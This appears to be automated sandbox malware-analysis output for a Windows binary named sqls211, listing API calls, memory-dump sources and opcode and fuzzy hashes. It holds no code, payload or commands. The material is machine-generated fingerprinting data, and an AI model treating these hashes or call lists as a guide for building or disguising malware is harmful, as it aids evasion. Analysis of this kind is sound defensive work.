                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 3479602957-0
                                                                                                            • Opcode ID: bc155bd7904ed474d4a07d490dfdde8b31b7eba2decc267095f5e9cb88bf7c1c
                                                                                                            • Instruction ID: bb15be224b373f85a6c705c2bcc176f67f92f252fcb3f321e88e2a61eff1c9c5
                                                                                                            • Opcode Fuzzy Hash: bc155bd7904ed474d4a07d490dfdde8b31b7eba2decc267095f5e9cb88bf7c1c
                                                                                                            • Instruction Fuzzy Hash: 72D0C971348300BFFA110B628E06F2E7B99BF45B91F18C409B795E80E1CA789564E62A
                                                                                                            APIs
                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CF19EF,?,?,00000008,?,?,00CF168F,00000000), ref: 00CF1C21
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID:
                                                                                                            • API String ID: 3997070919-0
                                                                                                            • Opcode ID: 59e89c8ccafb069c514c2c2297b34b7cfbf5592ebf25109ac1b28718813c0d56
                                                                                                            • Instruction ID: 2a87a58a3597d47af7608b2016e9adef07123fdc4329ba587f160e8839ab1b72
                                                                                                            • Opcode Fuzzy Hash: 59e89c8ccafb069c514c2c2297b34b7cfbf5592ebf25109ac1b28718813c0d56
                                                                                                            • Instruction Fuzzy Hash: 57B16E71210608DFD755CF28C48AB657BE0FF45364F298658EEAACF2A1C335DA92CB41
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CDF66A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                            • String ID:
                                                                                                            • API String ID: 2325560087-0
                                                                                                            • Opcode ID: 5af74344436509a668e42aaaa192bbfaee2923155b8f8a51ad82c618935798b3
                                                                                                            • Instruction ID: 83666db047a09911066ac5868eed1ac2a8c2c3cb20f9695ac21a090ecb0cac47
                                                                                                            • Opcode Fuzzy Hash: 5af74344436509a668e42aaaa192bbfaee2923155b8f8a51ad82c618935798b3
                                                                                                            • Instruction Fuzzy Hash: 16517E71A00619DFDB28CF54E8817AEB7F4FB58314F24852BD512EB3A1D374AA42CB61
                                                                                                            APIs
                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Version
                                                                                                            • String ID:
                                                                                                            • API String ID: 1889659487-0
                                                                                                            • Opcode ID: d7fc1c42039572af1d7f744e9144ef583664df40de0ff75b3fcfa4039469d8b1
                                                                                                            • Instruction ID: 2361aea24d6c6df7140be6d26e42036374fc59f905605474a7f83d4599c31a12
                                                                                                            • Opcode Fuzzy Hash: d7fc1c42039572af1d7f744e9144ef583664df40de0ff75b3fcfa4039469d8b1
                                                                                                            • Instruction Fuzzy Hash: 2FF017B9E002188FDB18CB18EC92BE977B2EB88315F544299D519D3390C7B0AE84CE65
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: gj
                                                                                                            • API String ID: 0-4203073231
                                                                                                            • Opcode ID: a11fab5f79d7221be051c278063b1dc4256499fa3454e3175b948720a5fac858
                                                                                                            • Instruction ID: 39a2e00acb3e5a61890bda591f7188c1e9de8ea5b1207a5729ef8bdd1c913831
                                                                                                            • Opcode Fuzzy Hash: a11fab5f79d7221be051c278063b1dc4256499fa3454e3175b948720a5fac858
                                                                                                            • Instruction Fuzzy Hash: D4C13676A183818FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E945CB96
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CDF3A5), ref: 00CDF9DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: f74d8a8997d7c039c2c5cfb488a856382638142848cde2dd5f72325cdd2842b7
                                                                                                            • Instruction ID: 8028973fb022e60138ddea80e6a117f7bfa10d7d337e0f4e64088a8a45399b0c
                                                                                                            • Opcode Fuzzy Hash: f74d8a8997d7c039c2c5cfb488a856382638142848cde2dd5f72325cdd2842b7
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 54951025-0
                                                                                                            • Opcode ID: 0a7f4842a08ff4a46c05381a3101d5dd96c6c45d86c2c801a0a304ea5388d078
                                                                                                            • Instruction ID: 78d51fb1f0f409f87f5c6f2f30d8997644efc37af6cb556811808d24b56f4975
                                                                                                            • Opcode Fuzzy Hash: 0a7f4842a08ff4a46c05381a3101d5dd96c6c45d86c2c801a0a304ea5388d078
                                                                                                            • Instruction Fuzzy Hash: F1A02230203300FFC300CF30AF0CB2C3BE8AA283E2308802AB008C0230EB3080A0EB02
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                            • Instruction ID: 4800f88b1e86e75450f3dcfaaf6479dd8a6896d350295f639f1d86295592b76c
                                                                                                            • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                            • Instruction Fuzzy Hash: 8062D8716047849FCB25CF38C8906B9BBE1AF95304F08896FD9EA8B346D734EA45DB11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                            • Instruction ID: fef54d40e2703033dbe253ce4a96c79322c9da7c8e16fbe0704a9a3936c1a69f
                                                                                                            • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                            • Instruction Fuzzy Hash: FE62E97160C3458FCB15CF28C8909B9BBE1BFD5304F18866EE99A8B346E730E945DB15
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                            • Instruction ID: 1d44ef139e8366c4eb9a77c592fcb3a50a9ddd27c72590be74b13c9e2213ba5a
                                                                                                            • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                            • Instruction Fuzzy Hash: 9F524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c92a67ae5353e33460d92115885762a57529239f7ca111212b4f30afe15c673
                                                                                                            • Instruction ID: c93040e91ec02349d0b661d2ba54cdc458eb74571675bb9554b60f212df0dc7c
                                                                                                            • Opcode Fuzzy Hash: 7c92a67ae5353e33460d92115885762a57529239f7ca111212b4f30afe15c673
                                                                                                            • Instruction Fuzzy Hash: 3412D3B16087069FC719CF28C490AB9B7E0FF94304F148A2EEA96C7780E334E995DB45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 00f7ee5601ba1f81d1223ced605bf6e85b0a91096ca14c1ed522844a63683ec7
                                                                                                            • Instruction ID: 3028f0a382ec455514df48a3bede132fc412d5613b4bfbd030c3bf78e78dd9bd
                                                                                                            • Opcode Fuzzy Hash: 00f7ee5601ba1f81d1223ced605bf6e85b0a91096ca14c1ed522844a63683ec7
                                                                                                            • Instruction Fuzzy Hash: 01F19A71A083418FC718CF29C5D4A2EBBE5EFDA354F144A2EF49AD7252D630EA45CB42
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3519838083-0
                                                                                                            • Opcode ID: 4ea7be89afbb94d878430ae473ac2f75459c75ed4f599bdf1a55a6c2b038028e
                                                                                                            • Instruction ID: 8e38d2af33534c81c1ed77906e0c655307167e88fbd08b26ed188992bed0657c
                                                                                                            • Opcode Fuzzy Hash: 4ea7be89afbb94d878430ae473ac2f75459c75ed4f599bdf1a55a6c2b038028e
                                                                                                            • Instruction Fuzzy Hash: 8CD1F8B16083408FDB14CF28C98475BBBE1BF89308F08456EFA999B342D774EA05CB56
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e7f57f11d5f313b0befa4210889344c6598b7e04a1cc343691f1f39d26a216d7
                                                                                                            • Instruction ID: ec66eb155e3c13712036ee14e0958eab93a223787c2a62ba54d81ffba5ee5f88
                                                                                                            • Opcode Fuzzy Hash: e7f57f11d5f313b0befa4210889344c6598b7e04a1cc343691f1f39d26a216d7
                                                                                                            • Instruction Fuzzy Hash: 2DE128755083948FC304CF29D89096ABFF0AF9A310F45495EF9D897392C235EA19DFA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                            • Instruction ID: ae8b1a342f7841b3e35451c7bde938ed2b53b82941bd6f8fc60a1bdaa7945338
                                                                                                            • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                            • Instruction Fuzzy Hash: 789145B02003499BDB2CEF68D899BBE77D5EB60304F10092EE796873C2DB749646D352
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                            • Instruction ID: 59add1a23be4f4217d4a2af988b56b097ea5d4b4075c0942baf6a74c3e6c820a
                                                                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                            • Instruction Fuzzy Hash: 49813B713043469BDB2CDE68D8D5BBD77D4AB91308F00092FFB968B382DA70C9869756
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d041f0a8f5dbd3cc819f8b04bc32896f0aa3bdc0bb405eb29363f97ad8ee2281
                                                                                                            • Instruction ID: 5165a2e02f586c00ce4fff492c5b405c532668a075dd162694359eaf3e13a50b
                                                                                                            • Opcode Fuzzy Hash: d041f0a8f5dbd3cc819f8b04bc32896f0aa3bdc0bb405eb29363f97ad8ee2281
                                                                                                            • Instruction Fuzzy Hash: 4561CE75A00FC957CE389A6B58927BE2394EF0134CF14051AE763DF2D2D691DF429315
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                            • Instruction ID: 720fbb2404c505c779ef9bcbd4913ef5a22e2bcc6c05a53a434c4f4322c7446c
                                                                                                            • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                            • Instruction Fuzzy Hash: DE514771600FC857DF3889AB8556FBF63C59B0270CF180919F8A3DB282C615EF4593A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
